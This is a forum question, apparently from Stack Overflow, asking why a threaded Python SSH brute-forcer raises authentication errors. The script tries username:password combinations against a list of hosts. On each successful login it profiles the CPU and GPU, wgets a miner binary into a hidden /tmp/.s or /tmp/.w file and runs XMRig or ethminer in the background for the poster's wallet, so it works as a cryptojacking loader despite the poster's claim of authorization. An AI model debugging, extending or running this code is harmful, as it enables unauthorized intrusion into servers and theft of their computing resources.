# How do I fix this parallel SSH authentication error?

Tags: python, python-3.x, brute-force

This program is meant to be an auto loader for servers to install miners on. I used brute force so it's easier and faster. This is purely experimental and authorized under my own IP's. It gives me an authentication error when connecting to an SSH device:

> ('Authentication error while connecting to %s:%s - %s', '1.1.1.1', 22,
> AuthenticationError())

I've modified sleep time delays but it still outputs the error.

````py
from sys import stdin, stderr, argv, exit
from os import path
import queue
import logging
import threading
import time
from pssh.exceptions import AuthenticationException
from pssh.clients import SSHClient
import configparser
from time import sleep

#Config setup
CONFIG = configparser.ConfigParser()
CONFIG.read('config.ini')
SESSION_CONFIG = CONFIG["SESSION"]
MINER_CONFIG = CONFIG["MINER"]

combos = []
hosts = queue.Queue()
printq = queue.Queue()
clients = []

VERSION_CHECK = r"grep ID= /etc/os-release | cut -d= -f2 | tr [A-Z] [a-z] | sed ':a;N;$!ba;s/\n//g' | sed 's/\"//g' | sed 's/\.//g'"


class ClientConn:
    def __init__(self, client, host):
        self.client = client
        self.has_gpu = False
        self.gpu_info = {}
        self.cpu_cores = 0
        self.gpu_count = 0
        self.release = None
        self.host = host
    def get_release(self):
        try:
            host_out = self.client.run_command(VERSION_CHECK)
            for ln in host_out.stdout:
                if ln.strip() != "":
                    self.release = ln.strip()
        except:
            return


def xmrrig_install(conn):
    try:
        client = conn.client
        if (conn.has_gpu) or ('GPU_MINING' not in MINER_CONFIG):
            #CPU Mining
            host_out = client.run_command(f"rm -rf /tmp/.s;cd /tmp;wget -O .s {MINER_CONFIG['BIN_URL']}/xmrig;chmod +x /tmp/.s")
            for _ in host_out.stdout:
                pass
            exec_cmd = f'/tmp/.s -B -o {MINER_CONFIG["POOL_URL"]} -u {MINER_CONFIG["WALLET_ADDR"]}'
            if 'POOL_PASSWORD' in MINER_CONFIG:
                exec_cmd += f' -p {MINER_CONFIG["POOL_PASSWORD"]}'
            if 'KEEP_ALIVE' in MINER_CONFIG:
                exec_cmd += ' -k'
            if 'CPU_PRIORITY' in MINER_CONFIG:
                exec_cmd += f' --cpu-priority={MINER_CONFIG["CPU_PRIORITY"]}'
            if 'PROXY' in MINER_CONFIG:
                exec_cmd += f' --proxy={MINER_CONFIG["PROXY"]}'
            if 'TLS' in MINER_CONFIG:
                exec_cmd += '--tls'
            client.run_command(exec_cmd)
            printq.put(f"[+] {conn.host} -> Dropped miner")
            return
        elif(conn.has_gpu):
            host_out = client.run_command(f"rm -rf /tmp/.w;cd /tmp;wget -O .w {MINER_CONFIG['BIN_URL']}/ethminer;chmod +x /tmp/.w")
            for _ in host_out.stdout:
                pass
            exec_cmd = f'/tmp/.w --cuda -P {MINER_CONFIG["ETH_POOL_URL"]}'
            host_out = client.run_command('wget https://developer.download.nvidia.com/compute/cuda/11.2.2/local_installers/cuda_11.2.2_460.32.03_linux.run')
            host_out = client.run_command('sh cuda_11.2.2_460.32.03_linux.run --silent --toolkit')
            client.run_command(exec_cmd)
    except:
        return


def getinfo(conn):
    try:
        client = conn.client
        host_out = client.run_command("cat /proc/cpuinfo | grep cores | uniq | cut -d: -f2")
        for ln in host_out.stdout:
            if ln.strip() != "":
                try:
                    conn.cpu_cores = int(ln.strip())
                except ValueError:
                    return
                printq.put(f"[+] {conn.host} CPU CORES = {conn.cpu_cores}")
        if 'GPU_MINING' in MINER_CONFIG:
            conn.has_gpu = True
            host_out = client.run_command("ls /proc/driver/nvidia/gpus")
            for ln in host_out.stderr:
                if "No such file or directory" in ln:
                    conn.has_gpu = False
                    printq.put(f"[+] {conn.host} -> No GPU")
            if conn.has_gpu:
                for ln in host_out.stdout:
                    if not ln.strip() == "":
                        for gpu_id in ln.split():
                            conn.gpu_info[gpu_id] = ""
                            host_out = client.run_command(f"cat /proc/driver/nvidia/gpus/{gpu_id}/info")
                            for ln in host_out.stdout:
                                conn.gpu_info[gpu_id] += ln+'\n'
                conn.gpu_count = len(conn.gpu_info)
                printq.put(f'GPU Count: {conn.gpu_count}')
                for gpu_id in conn.gpu_info.keys():
                    printq.put(f"[+]{conn.host} -> GPU {gpu_id}:\n{conn.gpu_info[gpu_id]}")
                conn.get_release()
        xmrrig_install(conn)
    except:
        return

def brute():
    while hosts.qsize() > 0:
        host = hosts.get()
        conn = None
        success = False

        for combo in combos:
            try:
                sleep(0.5)
                user,pw = tuple(combo.split())
                printq.put(user + ' ' + pw)
                client = SSHClient(host,
                                   user=user,
                                   password=pw,
                                   identity_auth=False,
                                   port=22,
                                   timeout=int(SESSION_CONFIG['SSH_TIMEOUT']),
                                   num_retries=0)
                success = True
                time.sleep(1)
                conn = ClientConn(client,host)
                clients.append(conn)
                break
            except AuthenticationException as e:
                print(e)
                continue
            except Exception:
                printq.put(f"[+] {host} -> Could not connect")
                break
        if success:
            printq.put(f"[+] {host} -> Successful Login {user}:{pw}")
            getinfo(conn)
def print_thread():
    while True:
        if not printq.qsize() == 0:
            print(printq.get())
            sleep(0.01)

def main():
    if len(argv) != 2:
        stderr.write(f"Usage: ./{argv[0]} combo.txt < hosts.txt")
        exit(1)

    if not path.exists(argv[1]):
        stderr.write(f"{argv[1]}: File not found")
        exit(2)
    # initialize host queue
    for line in stdin:
        hosts.put(line.strip())

    # initialize combos from file (format: user pass)
    with open(argv[1]) as f:
        for line in f:
            combos.append(line)
    for _ in range(int(SESSION_CONFIG['THREADS'])):
        threading.Thread(target=brute).start()
    threading.Thread(target=print_thread, daemon=True).start()
if __name__ == '__main__':
    main()```
````

Comment: Have you tried connecting via SSH manually? That might give you a hint as to which part is going wrong.

Comment: Could you provide a copy of your `config.ini` please with fake information so it's possible to run and debug the script please?

Comment: @RustyFluff yeah sure bro hold on

https://pst.klgrth.io/paste/ychq4